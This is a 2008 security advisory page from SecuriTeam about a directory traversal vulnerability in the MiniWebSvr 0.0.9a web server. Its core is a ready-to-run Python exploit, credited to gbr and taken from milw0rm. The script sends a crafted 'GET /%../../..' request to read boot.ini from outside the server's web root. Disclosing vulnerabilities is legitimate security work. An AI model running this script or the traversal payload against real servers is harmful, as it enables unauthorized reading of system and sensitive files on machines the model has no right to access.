Security News -  Security Reviews -   Exploits -  Tools -  UNIX Focus -  Windows Focus
SecuriTeam™  Beyond Security®  SecuriTeam™ Home  Ask the Team  Mailing Lists  Advertising Info  Blogs  Black Box Testing  Vulnerability Assessment  Vulnerability Scanner SecuriTeam™ in Your Inbox   E-mail this article to a friend New vulnerability? New tool? Tell us	MiniWebSvr Directory Transversal Vulnerability 3 Mar. 2008    Summary MiniWebsvr is "a tiny/small HTTP web server that aims to one day be embeddable". A vulnerability in MiniWebSvr allows remote attackers to access files that reside outside the bounding HTML root directory.   Credit: The information has been provided by gbr. The original article can be found at: http://www.milw0rm.com/exploits/5212    Details Audit your web server for security holes - see what the hackers see. Sign up for a scan today - risk free! Vulnerable Systems:  * MiniWebSvr version 0.0.9a Exploit: import socket import sys print '---------------------------------------------------------' print 'MiniWebSvr 0.0.9a Directory Transversal Vulnerability' print 'Project URL: http://miniwebsvr.sourceforge.net/' print 'Author: gbr' print 'Tested on Windows XP SP2' print '---------------------------------------------------------' host = "127.0.0.1" port = 8080 if sys.argv[1:]:         host = sys.argv[1]         if sys.argv[2:]:                 port = int(sys.argv[2]) try:         s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)         s.connect((host, port))         s.send("GET /%../../../../../../../../../../../boot.ini HTTP/1.0\r\n\r\n")         while True:                 data = s.recv(4096)                 if not data:                         break                 print data except:         print "Connection Error" # milw0rm.com [2008-03-03]  Comments:  Add new comment:  Subject:  Name/Nick/Email:          Chars Left:	All Sections Security News Unix focus Exploits Tools Windows focus Security Reviews  Related Articles Microsoft Outlook Web Access XSS (MS08-039) Vulnerabilities in DNS Allows Spoofing (MS08-037) Vulnerability in Windows Explorer Allows Code Execution (MS08-038) Vulnerabilities in Outlook Web Access for Exchange Server Allows Elevation of Privilege (MS08-039) Vulnerabilities in Microsoft SQL Server Allows Elevation of Privilege (MS08-040) Novell GroupWise Messenger Client (GWIM) Remote Stack Overflow Microsoft SQL Server Restore Integer Underflow Vulnerability (MS08-040) VLC Media Player WAV Processing Integer Overflow Diigo Toolbar Global XSS and Information Leakage in SSL URLs World in Conflict NULL Pointer CitectSCADA ODBC Service Vulnerability Vulnerabilities in Pragmatic General Multicast (PGM) Allows Denial of Service (MS08-036) Vulnerability in Active Directory Allows Denial of Service (MS08-035) Vulnerability in WINS Allows Elevation of Privilege (MS08-034) Vulnerabilities in DirectX Allows Code Execution (MS08-033)  Featured Articles Vulnerabilities in DNS Allows Spoofing (MS08-037) Vulnerabilities in Microsoft SQL Server Allows Elevation of Privilege (MS08-040) Multiple Cisco Products Vulnerable to DNS Cache Poisoning Attacks libpoppler Uninitialized Pointer Multiple Vendor X Server Vulnerabilities (SHM, RSE, REG, AllocateGlyph) Collection of Vulnerabilities in Fully Patched Vim Multiple Vendor FreeType2 Multiple Vulnerabilities
	Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus - Blogs - CVEs

Copyright © 1998-2008 Beyond Security® All rights reserved.
Terms of Use Site Privacy Statement.
SecuriTeam™ is a trademark of Beyond Security®